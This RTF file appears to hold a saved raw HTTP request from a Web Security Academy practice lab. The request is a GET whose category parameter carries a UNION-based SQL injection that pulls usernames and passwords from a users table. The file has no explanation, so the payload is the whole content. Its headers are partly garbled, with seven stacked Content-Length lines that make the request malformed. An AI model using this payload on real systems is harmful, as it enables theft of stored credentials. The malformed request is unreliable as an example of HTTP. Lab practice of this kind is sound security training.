{\rtf1\ansi\ansicpg1252\cocoartf2709
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 GET /filter?category=Gifts' UNION SELECT username,password FROM users--+ HTTP/2\
Host: 0a7b001003a10c24836f26910033008c.web-security-academy.net\
Content-Length: 886\
\
Content-Length: 863\
\
Content-Length: 840\
\
Content-Length: 817\
\
Content-Length: 794\
\
Content-Length: 771\
\
Content-Length: 748\
\
Cookie: session=<redacted>\
Sec-Ch-Ua: "Chromium";v="139", "Not;A=Brand";v="99"\
Sec-Ch-Ua-Mobile: ?0\
Sec-Ch-Ua-Platform: "macOS"\
Accept-Language: en-US,en;q=0.9\
Upgrade-Insecure-Requests: 1\
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36\
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\
Sec-Fetch-Site: same-origin\
Sec-Fetch-Mode: navigate\
Sec-Fetch-User: ?1\
Sec-Fetch-Dest: document\
Referer: https://0a7b001003a10c24836f26910033008c.web-security-academy.net/filter?category=Gifts\
Accept-Encoding: gzip, deflate, br\
Priority: u=0, i\
}